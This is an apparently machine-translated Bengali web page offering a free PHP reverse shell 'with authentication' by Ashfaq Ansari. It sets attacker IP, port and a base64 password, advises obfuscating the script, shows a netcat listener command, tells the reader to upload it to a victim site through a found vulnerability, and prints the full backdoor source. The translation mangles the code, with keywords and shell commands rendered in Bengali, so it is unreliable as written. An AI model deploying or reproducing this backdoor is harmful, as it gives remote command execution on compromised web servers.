শেল v1.0 পিএইচপি বিপরীত – প্রমাণীকরণ বৈশিষ্ট্য
দ্বারা পণ্য:
Ashfaq আনসারি
সংস্করণ:
1.0
দাম:
বিনামূল্যে

দ্বারা পর্যালোচনা:
নির্ধারণ:
5
অন অক্টোবর 9, 2012
শেষ বার পরিমার্জিত:জানুয়ারী 18, 2013

সংক্ষিপ্ত:

Inbuilt প্রমাণীকরণ বৈশিষ্ট্যের সাথে পিএইচপি শেল Connect বিপরীত. আপনার পশ্চাদ্দ্বার রক্ষা জট্টিল স্ক্রিপ্ট.

ভূমিকা

 

এই সরঞ্জামের সাহায্যে আপনি আপলোড পিএইচপি চলমান একটি ওয়েবসার্ভার অ্যাক্সেস আছে যেখানে pentest পরিস্থিতির জন্য ডিজাইন করা হয়েছে.
ওয়েব রুট কোথাও এই স্ক্রিপ্ট আপলোড করুন তারপর আপনার ব্রাউজার উপযুক্ত URL-এ অ্যাক্সেস করে এটি চালানোর জন্য. স্ক্রিপ্ট স্ক্রিপ্ট সংজ্ঞায়িত একটি হোস্ট এবং পোর্ট আপনি ওয়েবসার্ভার থেকে একটি বহির্গামী করে TCP সংযোগ খোলা হবে. এই করে TCP সংযোগের বাধ্য শেল হতে হবে.
 

এই আপনার মত interective প্রোগ্রাম রান করতে পারেন যা একটি সঠিক ইন্টারেক্টিভ শেল হতে হবে Telnet এবং SSH-.
এই শেল আপনার পশ্চাদ্দ্বার অপব্যবহারের থেকে অন্য কেউ বাধা দেয় যা একটি Inbuilt প্রমাণীকরণ বৈশিষ্ট্য আছে.
এটি আপনি একটি কমান্ডের সাহায্যে পাঠাতে অনুমতি দেয়, যা ওয়েব ফর্ম ভিত্তিক শেল থেকে পৃথক, তারপর আপনি আউটপুট ফিরে.
 

উৎস পরিবর্তন করুন

 

1
2
3
$IP = "127.0.0.1"; #আপনার সার্বজনীন IP পরিবর্তন
$পোর্ট = 4444;      #আপনার পোর্ট পরিবর্তন
$পাসওয়ার্ড = base64_decode("aGFja3N5c3RlYW0="); #ডিফল্ট পাসওয়ার্ড: hacksysteam (MD5)

 

আপনার প্রয়োজন এবং পরিস্থিতি অনুযায়ী মান পরিবর্তন করুন.
 

উত্স Obfuscate

 

একবার আপনি পরিবর্তন করতে পেরেছেন, আপনি যেকোন অনলাইন ব্যবহার করতে পারেন পিএইচপি Obfuscator পিএইচপি স্ক্রিপ্ট সঙ্কেতাক্ষরে লিখা.
 

উদাহরণ: http://www.codeeclipse.com/
 

Obfuscating আগে, আপনার প্রয়োজন অনুযায়ী উপরোক্ত মান পরিবর্তন করুন.
 

সেটআপ Netcat লিসেনার

 

ওয়েব সার্ভার ব্যবহার করা হবে যে একটি হোস্ট এবং পোর্টে একটি Netcat শ্রোতা শুরু করুন.
উদাহরণস্বরূপ বিপরীত শেল স্ক্রিপ্ট উল্লিখিত এখানে একই পোর্ট ব্যবহার (4444):
 

1
root-র @ BT:~ # NC -lvvp 4444

 

স্ক্রিপ্ট আপলোড করুন এবং এটি সম্পাদন করুন

 

দুর্বলতা ব্যবহার করে ওয়েবসাইট আপনাকে আবিষ্কার, আপলোড reverse_shell.php.
আপনার ওয়েব ব্রাউজারে নতুন আপলোড হওয়া ফাইল ব্রাউজ কেবল স্ক্রিপ্ট সঞ্চালন করুন.
 

1
HTTP://<ভিক্টিম আইপি>/<পথ আপলোড করুন>/reverse_shell.php

 

উল্লেখ্য,: আপনি ওয়েব পেজে কোন আউটপুট দেখতে পাবেন না, এটা মোড অপেক্ষা অব্যাহত তার যদি সফল.
 

আপনার শেল সঙ্গে Loot

 

সোর্স কোড

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?পিএইচপি
###################################################
#               Reverse Shell v1.0 #
#             Authentication Feature #
#                                                 #
#            Hacksys টিম - Panthera #
#             লেখক: Ashfaq আনসারি #
#            hacksysteam@hotmail.com #
#          HTTP://hacksys.vfreaks.com #
#              Designed for Linux #
#             Thanks to lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$সংস্করণ = "1.0";
$IP = "127.0.0.1"; #এই পরিবর্তন করুন
$পোর্ট = 4444;      #এই পরিবর্তন করুন
$পাসওয়ার্ড = base64_decode(&quot;aGFja3N5c3RlYW0="); #ডিফল্ট পাসওয়ার্ড: hacksysteam (MD5)

$ব্যানার = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __/ |                                
|__ __|                      |___ /
   | | ___ __ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Reverse Shell in PHP
    লেখক: Ashfaq আনসারি
   hacksysteam@hotmail.com
 HTTP://hacksys.vfreaks.com /\N\N"
);

$pwd = shell_exec("PWD");
$sysinfo = shell_exec("Uname-A");
$আইডি = shell_exec('আইডি | "কাটা-D(" -চ 2 | "কাটা-D)" -চ 1 ');
$জন্ম = shell_exec("তারিখ");
$শুধুমাত্র = 1337;
$তথ্য =
("
সিস্টেম তথ্য:\N$sysinfo
বর্তমান ডিরেক্টরিতে: $pwd
ব্যবহারকারী গোষ্ঠী: $আইডি
বর্তমান তারিখ ও সময়: $জন্ম\N
"
);

প্রিন্ট "\Nসংযোগের চেষ্টা: $IP পোর্টে $পোর্ট ...\N\N";

$sockfd = fsockopen($IP , $পোর্ট , $errno, $errstr );

যদি($errno != 0)
  {
    প্রিন্ট "\N****** ত্রুটি ঘটেছে ******\Nত্রুটি Nnumber: $errno\Nত্রুটি স্ট্রিং: $errstr\N\N";
    দী(0);
  }
অন্য যদি (!$sockfd)
  {
    প্রিন্ট "মারাত্মক : সাথে সংযোগ করার চেষ্টা করার সময় একটি অপ্রত্যাশিত ত্রুটি ঘটেছে ছিল!\N";
  }
অন্য
  {
    প্রিন্ট "আপনি সংযুক্ত: $IP পোর্টে $পোর্ট ...\N\N";
    fputs ($sockfd , $ব্যানার);
    fputs($sockfd ,"পাসওয়ার্ড লিখুন: ");
    $getpass = ছাঁটা(fgets($sockfd, strlen($পাসওয়ার্ড) + 2));

    যদি ($getpass == $পাসওয়ার্ড)
    {
      fputs($sockfd, "\Nপ্রমাণীকরণ Successfull..\N");
      fputs($sockfd, $তথ্য);
      যখন(!EOF($sockfd))
      {
    $cmdPrompt = ছাঁটা($আইডি) . "@" . ছাঁটা($IP) . ":~" . ছাঁটা($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $কমান্ড = ছাঁটা(fgets($sockfd, $শুধুমাত্র));
        যদি (ছাঁটা($কমান্ড) == "প্রস্থান")
    {
      fputs($sockfd ,"\Nব্যবহারকারী দ্বারা বাতিল ... থেকে প্রস্থান ..." );
      fclose($sockfd);
      দী(0);
    }
    fputs($sockfd , "\N" . shell_exec($কমান্ড) . "\N");
      }
      fclose($sockfd);
      দী(0);
    }
    অন্য
    {
      fputs($sockfd ,"\Nপাসওয়ার্ড অবৈধ ... প্রস্থান ...");
      fclose($sockfd);
      দী(0);
    }
  }
?>

 

স্ক্রীনশট

 


 

বিপরীত শেল v1.0 পিএইচপি ডাউনলোড – প্রমাণীকরণ বৈশিষ্ট্য

 

Reverse_Shell_v1.0.zip

 
 
 

21,006 মোট দেখেছে, 14 দেখ আজ

নিম্নলিখিত দুটি ট্যাব নীচের বিষয়বস্তু পরিবর্তন.

Ashfaq আনসারি

নিরাপত্তা গবেষক
আশফাক আনসারীর প্রতিষ্ঠাতা HackSys টিম নামক কোড "প্যানথেরা". তিনি তথ্য নিরাপত্তা বিভিন্ন বৈশিষ্ট্য অভিজ্ঞতার সঙ্গে একটি নিরাপত্তা গবেষক হয়. তিনি রচনা করেছেন "HackSys চরম অরক্ষিত ড্রাইভার" এবং "মৃত্যু Shellcode". তিনি লিখিত এবং নিম্ন স্তরের সফ্টওয়্যার শোষণ বিভিন্ন শ্বেতপত্রগুলি প্রকাশ করেছে. তার কোর সুদ এই ব্যবস্থার সবচেয়ে গুরত্বপূর্ণ "নিম্ন শ্রেনী শোষণ", "রিভার্স ইঞ্জিনিয়ারিং", "প্রোগ্রাম বিশ্লেষণ" এবং "হাইব্রীড Fuzzing". তিনি কৃত্রিম বুদ্ধিমত্তা এবং মেশিন লার্নিং একটি Fanboy হয়. তিনি অধ্যায় সীসা নাল পুনে.

একটি উত্তর ত্যাগ

আপনার ইমেল ঠিকানা প্রকাশিত হবে না. প্রয়োজনীয় ক্ষেত্রগুলি চিহ্নিত হয় *